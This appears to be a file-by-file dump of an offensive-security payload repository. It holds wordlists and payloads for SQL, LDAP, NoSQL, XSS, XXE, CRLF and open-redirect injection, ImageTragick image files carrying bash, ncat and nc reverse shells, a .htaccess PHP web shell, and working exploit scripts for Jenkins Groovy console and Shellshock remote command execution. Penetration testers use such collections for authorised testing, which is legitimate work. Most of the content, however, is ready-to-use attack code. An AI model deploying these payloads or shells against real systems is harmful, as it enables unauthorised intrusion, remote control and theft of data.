Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt: -------------------------------------------------------------------------------- 1 | # mysql local file disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/Mac-files.txt: -------------------------------------------------------------------------------- 1 | /etc/apache2/httpd.conf 2 | /Library/WebServer/Documents/index.html 3 | /private/var/log/appstore.log 4 | /var/log/apache2/error_log 5 | /var/log/apache2/access_log 6 | /usr/local/nginx/conf/nginx.conf 7 | /var/log/nginx/error_log 8 | /var/log/nginx/access_log -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops 9 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/index.stm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/extensions.lst: -------------------------------------------------------------------------------- 1 | .jpeg.php 2 | .jpg.php 3 | .png.php 4 | .php 5 | .php3 6 | .php4 7 | .php5 8 | .php7 9 | .pht 10 | .phar 11 | .phpt 12 | .pgif 13 | .phtml 14 | .phtm 15 | .php%00.gif 16 | .php\x00.gif 17 | .php%00.png 18 | .php\x00.png 19 | .php%00.jpg 20 | .php\x00.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 7 | pop graphic-context 8 | pop graphic-context 9 | 10 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/Web-files.txt: -------------------------------------------------------------------------------- 1 | /robots.txt 2 | /humans.txt 3 | /style.css 4 | /configuration.php 5 | wp-login.php 6 | wp-admin.php 7 | /wp-content/plugins 8 | /include/config.php 9 | /inc/config.php 10 | /include/mysql.php 11 | /inc/mysql.php 12 | /sites/defaults/settings.php 13 | /phpmyadmin/changelog.php 14 | web.config -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_attributes.txt: -------------------------------------------------------------------------------- 1 | c 2 | cn 3 | co 4 | commonName 5 | dc 6 | facsimileTelephoneNumber 7 | givenName 8 | gn 9 | homePhone 10 | id 11 | jpegPhoto 12 | l 13 | mail 14 | mobile 15 | name 16 | o 17 | objectClass 18 | ou 19 | owner 20 | pager 21 | password 22 | sn 23 | st 24 | surname 25 | uid 26 | username 27 | userPassword 28 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XXE Injection/Files/Deny Of Service - Billion Laugh Attack: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | ]> 8 | &a4; -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQLi_Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 3 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' 7 | pop graphic-context 8 | pop graphic-context 9 | -------------------------------------------------------------------------------- /XXE Injection/Files/XXE PHP Wrapper.xml: -------------------------------------------------------------------------------- 1 | ]> 2 | 3 | 4 | Jean &xxe; Dupont 5 | 00 11 22 33 44 6 |

42 rue du CTF

7 | 75000 8 | Paris 9 | 10 | 11 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml: -------------------------------------------------------------------------------- 1 | XXE OOB Attack (Yunusov, 2013) 2 | 3 | 4 | &send; 5 | 6 | File stored on http://publicServer.com/parameterEntity_oob.dtd 7 | 8 | "> 9 | %all; -------------------------------------------------------------------------------- /File Inclusion/Intruders/BSD-files.txt: -------------------------------------------------------------------------------- 1 | /usr/pkg/etc/httpd/httpd.conf 2 | /usr/local/etc/apache22/httpd.conf 3 | /usr/local/etc/apache2/httpd.conf 4 | /var/www/conf/httpd.conf 5 | /var/www/logs/error_log 6 | /var/www/logs/access_log 7 | /etc/apache2/httpd2.conf 8 | /var/apache2/logs/error_log 9 | /var/apache2/logs/access_log 10 | /var/log/httpd-error.log 11 | /var/log/httpd-access.log 12 | /var/log/httpd/error_log 13 | /var/log/httpd/access_log -------------------------------------------------------------------------------- /XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt: -------------------------------------------------------------------------------- 1 | alert`1` 2 | alert(1) 3 | alert(1) 4 | alert(1) 5 | (alert)(1) 6 | a=alert,a(1) 7 | [1].find(alert) 8 | top["al"+"ert"](1) 9 | top[/al/.source+/ert/.source](1) 10 | al\u0065rt(1) 11 | top['al\145rt'](1) 12 | top['al\x65rt'](1) 13 | top[8680439..toString(30)](1) 14 | navigator.vibrate(500) 15 | eval(URL.slice(-8))>#alert(1) 16 | eval(location.hash.slice(1)>#alert(1) 17 | innerHTML=location.hash># 18 | -------------------------------------------------------------------------------- /_template_vuln/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Title 2 | 3 | > Vulnerability description - reference 4 | 5 | ## Summary 6 | 7 | - [Tools](#tools) 8 | * [Something](#something) 9 | * [Subentry 1](#sub1) 10 | * [Subentry 2](#sub2) 11 | 12 | ## Tools 13 | 14 | - [Tool 1](https://example.com) 15 | - [Tool 2](https://example.com) 16 | 17 | ## Something 18 | 19 | Quick explanation 20 | 21 | ```powershell 22 | Exploit 23 | ``` 24 | 25 | ## References 26 | 27 | - [Blog title - Author, Date](https://example.com) -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | alert(1) 5 | alert(2) 6 | 7 | 8 | confirm(document.domain)]]> 9 | 10 | 11 | Hello 12 | 13 | 14 | http://google.com 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Methodology and Resources/Miscellaneous - Tricks.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous & Tricks 2 | 3 | All the tricks that couldn't be classified somewhere else. 4 | 5 | ## Send a message to another user 6 | 7 | ```powershell 8 | # Windows 9 | PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" 10 | PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" 11 | 12 | # Linux 13 | $ wall "Stop messing with the XXX service !" 14 | $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root 15 | $ who 16 | $ write root pts/2 # press Ctrl+D after typing the message. 17 | ``` -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess: -------------------------------------------------------------------------------- 1 | # Self contained .htaccess web shell - Part of the htshell project 2 | # Written by Wireghoul - http://www.justanotherhacker.com 3 | 4 | # Override default deny rule to make .htaccess file accessible over web 5 | 6 | Order allow,deny 7 | Allow from all 8 | 9 | 10 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 | # the apache directoves from the .htaccess file 12 | AddType application/x-httpd-php .htaccess 13 | 14 | ###### SHELL ###### &1"); ?>###### LLEHS ###### 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/README.md: -------------------------------------------------------------------------------- 1 | If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter. 2 | 3 | Details from Busybox httpd.c 4 | 5 | https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60 6 | 7 | > *.php:/path/php # run xxx.php through an interpreter` 8 | 9 | > If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration. 10 | 11 | Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :) 12 | -------------------------------------------------------------------------------- /CRLF Injection/crlfinjection.txt: -------------------------------------------------------------------------------- 1 | /%%0a0aSet-Cookie:crlf=injection 2 | /%0aSet-Cookie:crlf=injection 3 | /%0d%0aSet-Cookie:crlf=injection 4 | /%0dSet-Cookie:crlf=injection 5 | /%23%0aSet-Cookie:crlf=injection 6 | /%23%0d%0aSet-Cookie:crlf=injection 7 | /%23%0dSet-Cookie:crlf=injection 8 | /%25%30%61Set-Cookie:crlf=injection 9 | /%25%30aSet-Cookie:crlf=injection 10 | /%250aSet-Cookie:crlf=injection 11 | /%25250aSet-Cookie:crlf=injection 12 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection 13 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection 14 | /%2F..%0d%0aSet-Cookie:crlf=injection 15 | /%3f%0d%0aSet-Cookie:crlf=injection 16 | /%3f%0dSet-Cookie:crlf=injection 17 | /%u000aSet-Cookie:crlf=injection 18 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | *()|%26' 5 | *()|&' 6 | *(|(mail=*)) 7 | *(|(objectclass=*)) 8 | *)(uid=*))(|(uid=* 9 | */* 10 | *| 11 | / 12 | // 13 | //* 14 | @* 15 | | 16 | admin* 17 | admin*)((|userpassword=*) 18 | admin*)((|userPassword=*) 19 | x' or name()='username' or 'x'='y 20 | ! 21 | %21 22 | %26 23 | %28 24 | %29 25 | %2A%28%7C%28mail%3D%2A%29%29 26 | %2A%28%7C%28objectclass%3D%2A%29%29 27 | %2A%7C 28 | %7C 29 | & 30 | ( 31 | ) 32 | )(cn=))\x00 33 | *(|(mail=*)) 34 | *(|(objectclass=*)) 35 | */* 36 | *| 37 | / 38 | // 39 | //* 40 | @* 41 | x' or name()='username' or 'x'='y 42 | | 43 | *()|&' 44 | admin* 45 | admin*)((|userpassword=*) 46 | *)(uid=*))(|(uid=* 47 | -------------------------------------------------------------------------------- /NoSQL Injection/Intruder/NoSQL.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | {"$gt": ""} 18 | [$ne]=1 19 | ';sleep(5000); 20 | ';sleep(5000);' 21 | ';sleep(5000);+' 22 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); 23 | -------------------------------------------------------------------------------- /XSS Injection/Files/JupyterNotebookXSS.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n" 8 | ] 9 | } 10 | ], 11 | "metadata": { 12 | "kernelspec": { 13 | "display_name": "Python 3", 14 | "language": "python", 15 | "name": "python3" 16 | }, 17 | "language_info": { 18 | "codemirror_mode": { 19 | "name": "ipython", 20 | "version": 3 21 | }, 22 | "file_extension": ".py", 23 | "mimetype": "text/x-python", 24 | "name": "python", 25 | "nbconvert_exporter": "python", 26 | "pygments_lexer": "ipython3", 27 | "version": "3.6.2" 28 | } 29 | }, 30 | "nbformat": 4, 31 | "nbformat_minor": 2 32 | } 33 | -------------------------------------------------------------------------------- /File Inclusion/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # 8 | Require all granted 9 | Order allow,deny 10 | Allow from all 11 | 12 | 13 | # Make the server treat .htaccess file as .php file 14 | AddType application/x-httpd-php .htaccess 15 | 16 | # 17 | 18 | # To execute commands you would navigate to: 19 | # http://vulnerable.com/.htaccess?cmd=YourCommand 20 | 21 | # If system(); isnt working then try other syscalls 22 | # e.g. passthru(); shell_exec(); etc 23 | # If you still cant execute syscalls, try bypassing php.ini via htaccess 24 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/README.md: -------------------------------------------------------------------------------- 1 | ### XSS via SWF 2 | 3 | As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. 4 | This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. 5 | 6 | ```powershell 7 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); 8 | 9 | IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 10 | 11 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); 12 | ``` -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/README.md: -------------------------------------------------------------------------------- 1 | # Image Tragik 1 & 2 2 | 3 | 4 | ## Exploit v1 5 | 6 | Simple reverse shell 7 | 8 | ```powershell 9 | push graphic-context 10 | encoding "UTF-8" 11 | viewbox 0 0 1 1 12 | affine 1 0 0 1 0 0 13 | push graphic-context 14 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 15 | pop graphic-context 16 | pop graphic-context 17 | ``` 18 | 19 | ## Exploit v2 20 | 21 | Simple `id` payload 22 | 23 | ```powershell 24 | %!PS 25 | userdict /setpagedevice undef 26 | save 27 | legal 28 | { null restore } stopped { pop } if 29 | { legal } stopped { pop } if 30 | restore 31 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops 32 | ``` 33 | 34 | then use `convert shellexec.jpeg whatever.gif` 35 | 36 | ## Thanks to 37 | 38 | * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) -------------------------------------------------------------------------------- /File Inclusion/Intruders/LFI-FD-check.txt: -------------------------------------------------------------------------------- 1 | /proc/self/cmdline 2 | /proc/self/stat 3 | /proc/self/status 4 | /proc/self/fd/0 5 | /proc/self/fd/1 6 | /proc/self/fd/2 7 | /proc/self/fd/3 8 | /proc/self/fd/4 9 | /proc/self/fd/5 10 | /proc/self/fd/6 11 | /proc/self/fd/7 12 | /proc/self/fd/8 13 | /proc/self/fd/9 14 | /proc/self/fd/10 15 | /proc/self/fd/11 16 | /proc/self/fd/12 17 | /proc/self/fd/13 18 | /proc/self/fd/14 19 | /proc/self/fd/15 20 | /proc/self/fd/16 21 | /proc/self/fd/17 22 | /proc/self/fd/18 23 | /proc/self/fd/19 24 | /proc/self/fd/20 25 | /proc/self/fd/21 26 | /proc/self/fd/22 27 | /proc/self/fd/23 28 | /proc/self/fd/24 29 | /proc/self/fd/25 30 | /proc/self/fd/26 31 | /proc/self/fd/27 32 | /proc/self/fd/28 33 | /proc/self/fd/29 34 | /proc/self/fd/30 35 | /proc/self/fd/31 36 | /proc/self/fd/32 37 | /proc/self/fd/33 38 | /proc/self/fd/34 39 | /proc/self/fd/35 -------------------------------------------------------------------------------- /XSS Injection/Intruders/xss_swf_fuzz.txt: -------------------------------------------------------------------------------- 1 | #getURL,javascript:alert(1)", 2 | #goto,javascript:alert(1)", 3 | ?javascript:alert(1)", 4 | ?alert(1)", 5 | ?getURL(javascript:alert(1))", 6 | ?asfunction:getURL,javascript:alert(1)//", 7 | ?getURL,javascript:alert(1)", 8 | ?goto,javascript:alert(1)", 9 | ?clickTAG=javascript:alert(1)", 10 | ?url=javascript:alert(1)", 11 | ?clickTAG=javascript:alert(1)&TargetAS=", 12 | ?TargetAS=javascript:alert(1)", 13 | ?skinName=asfunction:getURL,javascript:alert(1)//", 14 | ?baseurl=asfunction:getURL,javascript:alert(1)//", 15 | ?base=javascript:alert(0)", 16 | ?onend=javascript:alert(1)//", 17 | ?userDefined=');function someFunction(a){}alert(1)//", 18 | ?URI=javascript:alert(1)", 19 | ?callback=javascript:alert(1)", 20 | ?getURLValue=javascript:alert(1)", 21 | ?goto=javascript:alert(1)", 22 | ?pg=javascript:alert(1)", 23 | ?page=javascript:alert(1)" 24 | ?playerready=alert(document.cookie) 25 | -------------------------------------------------------------------------------- /Open Redirect/Intruder/open_redirect_wordlist.txt: -------------------------------------------------------------------------------- 1 | /http://example.com 2 | /%5cexample.com 3 | /%2f%2fexample.com 4 | /example.com/%2f%2e%2e 5 | /http:/example.com 6 | /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 7 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 8 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com 9 | /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 10 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 11 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com 12 | /.example.com 13 | ///\;@example.com 14 | ///example.com/ 15 | ///example.com 16 | ///example.com/%2f.. 17 | /////example.com/ 18 | /////example.com -------------------------------------------------------------------------------- /SQL Injection/Cassandra Injection.md: -------------------------------------------------------------------------------- 1 | # Cassandra Injection 2 | 3 | > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system 4 | 5 | ## Summary 6 | 7 | * [Cassandra comment](#cassandra-comment) 8 | * [Cassandra - Login Bypass](#cassandra---login-bypass) 9 | * [Login Bypass 0](#login-bypass-0) 10 | * [Login Bypass 1](#login-bypass-1) 11 | * [References](#references) 12 | 13 | ## Cassandra comment 14 | 15 | ```sql 16 | /* Cassandra Comment */ 17 | ``` 18 | 19 | ## Cassandra - Login Bypass 20 | 21 | ### Login Bypass 0 22 | 23 | ```sql 24 | username: admin' ALLOW FILTERING; %00 25 | password: ANY 26 | ``` 27 | 28 | ### Login Bypass 1 29 | 30 | ```sql 31 | username: admin'/* 32 | password: */and pass>' 33 | ``` 34 | 35 | The injection would look like the following SQL query 36 | 37 | ```sql 38 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 39 | ``` 40 | 41 | ## References 42 | 43 | 44 | -------------------------------------------------------------------------------- /Insecure Management Interface/Intruder/springboot_actuator.txt: -------------------------------------------------------------------------------- 1 | auditevents 2 | autoconfig 3 | beans 4 | caches 5 | conditions 6 | configprops 7 | dump 8 | env 9 | flyway 10 | health 11 | heapdump 12 | httptrace 13 | info 14 | integrationgraph 15 | jolokia 16 | logfile 17 | loggers 18 | liquibase 19 | metrics 20 | mappings 21 | prometheus 22 | scheduledtasks 23 | sessions 24 | shutdown 25 | threaddump 26 | trace 27 | actuator/auditevents 28 | actuator/autoconfig 29 | actuator/beans 30 | actuator/caches 31 | actuator/conditions 32 | actuator/configprops 33 | actuator/dump 34 | actuator/env 35 | actuator/flyway 36 | actuator/health 37 | actuator/heapdump 38 | actuator/httptrace 39 | actuator/info 40 | actuator/integrationgraph 41 | actuator/jolokia 42 | actuator/logfile 43 | actuator/loggers 44 | actuator/liquibase 45 | actuator/metrics 46 | actuator/mappings 47 | actuator/prometheus 48 | actuator/scheduledtasks 49 | actuator/sessions 50 | actuator/shutdown 51 | actuator/threaddump 52 | actuator/trace -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.xamlx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /CVE Exploits/Jenkins Groovy Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py 3 | # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b 4 | from __future__ import print_function 5 | from builtins import input 6 | import requests 7 | import sys 8 | 9 | print(""" 10 | Jenkins Groovy Console cmd runner. 11 | 12 | usage: ./jgc.py [HOST] 13 | 14 | Then type any command and wait for STDOUT output from remote machine. 15 | Type 'exit' to exit :) 16 | """) 17 | URL = sys.argv[1] + '/scriptText' 18 | HEADERS = { 19 | 'User-Agent': 'jgc' 20 | } 21 | 22 | while 1: 23 | CMD = input(">> Enter command to execute (or type 'exit' to exit): ") 24 | if CMD == 'exit': 25 | print("exiting...\n") 26 | exit(0) 27 | 28 | DATA = { 29 | 'script': 'println "{}".execute().text'.format(CMD) 30 | } 31 | result = requests.post(URL, headers=HEADERS, data=DATA) 32 | print(result.text) -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py: -------------------------------------------------------------------------------- 1 | # Generating "evil" zip file 2 | # Based on the work of Ajin Abraham 3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract 4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution 5 | 6 | # Warning 1: need a restart from the server OR debug=True 7 | # Warning 2: you won't get the output of the command (blind rce) 8 | import zipfile 9 | 10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] 11 | for d in directories: 12 | name = "python-"+d+"-__init__.py.zip" 13 | zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) 14 | zipf.close() 15 | z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") 16 | z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ 17 | z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") 18 | z_info.external_attr = 0o777 << 16 19 | z_file.close() 20 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /CVE Exploits/Shellshock CVE-2014-6271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Successful Output: 4 | # # python shell_shocker.py 5 | # [+] Attempting Shell_Shock - Make sure to type full path 6 | # ~$ /bin/ls / 7 | # bin 8 | # boot 9 | # dev 10 | # etc 11 | # .. 12 | # ~$ /bin/cat /etc/passwd 13 | 14 | from __future__ import print_function 15 | from future import standard_library 16 | standard_library.install_aliases() 17 | from builtins import input 18 | import sys, urllib.request, urllib.error, urllib.parse 19 | 20 | if len(sys.argv) != 2: 21 | print("Usage: shell_shocker ") 22 | sys.exit(0) 23 | 24 | URL=sys.argv[1] 25 | print("[+] Attempting Shell_Shock - Make sure to type full path") 26 | 27 | while True: 28 | command=input("~$ ") 29 | opener=urllib.request.build_opener() 30 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 31 | try: 32 | response=opener.open(URL) 33 | for line in response.readlines(): 34 | print(line.strip()) 35 | except Exception as e: print(e) 36 | 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Swissky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + 